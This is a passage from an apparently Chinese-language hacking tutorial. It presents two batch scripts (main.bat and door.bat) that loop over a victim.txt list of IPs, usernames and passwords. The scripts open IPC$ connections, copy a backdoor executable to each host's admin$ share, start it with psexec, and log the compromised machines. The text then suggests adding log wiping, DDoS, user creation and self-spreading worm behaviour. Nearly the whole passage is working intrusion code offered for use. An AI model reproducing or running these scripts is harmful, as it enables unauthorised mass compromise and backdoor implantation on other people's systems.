主要命令也只有一条:(在批处理文件中使用 FOR 命令时,指定变量使用 %%variable)
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k
tokens的用法请参见上面的sample1,在这里它表示按顺序将victim.txt中的内容传递给door.bat中的参数%i %j %k。
而cultivate.bat无非就是用net use命令来建立IPC$连接,并copy木马+后门到victim,然后用返回码(If errorlever =)来筛选成功种植后门的主机,并echo出来,或者echo到指定的文件。
delims= 表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样的了。应该根据%%i %%j %%k表示的对象来排列,一般就是 ip password username。
代码雏形:

————— cut here then save as a batchfile(I call it main.bat ) ——————–
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
————— cut here then save as a batchfile(I call it main.bat ) ——————–

——————- cut here then save as a batchfile(I call it door.bat) —————–
@net use \\%1\ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection …………OK
@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt
@p***ec \\%1 c:\winnt\system32\windrv32.exe
@p***ec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.
—————– cut here then save as a batchfile(I call it door.bat) ——————-
这只是一个自动种植后门批处理的雏形,两个批处理和后门程序(Windrv32.exe),PSexec.exe需放在统一目录下.批处理内容
尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使之具备自动传播功能(蠕虫).此处不多做叙述,有兴趣的朋友可自行研究.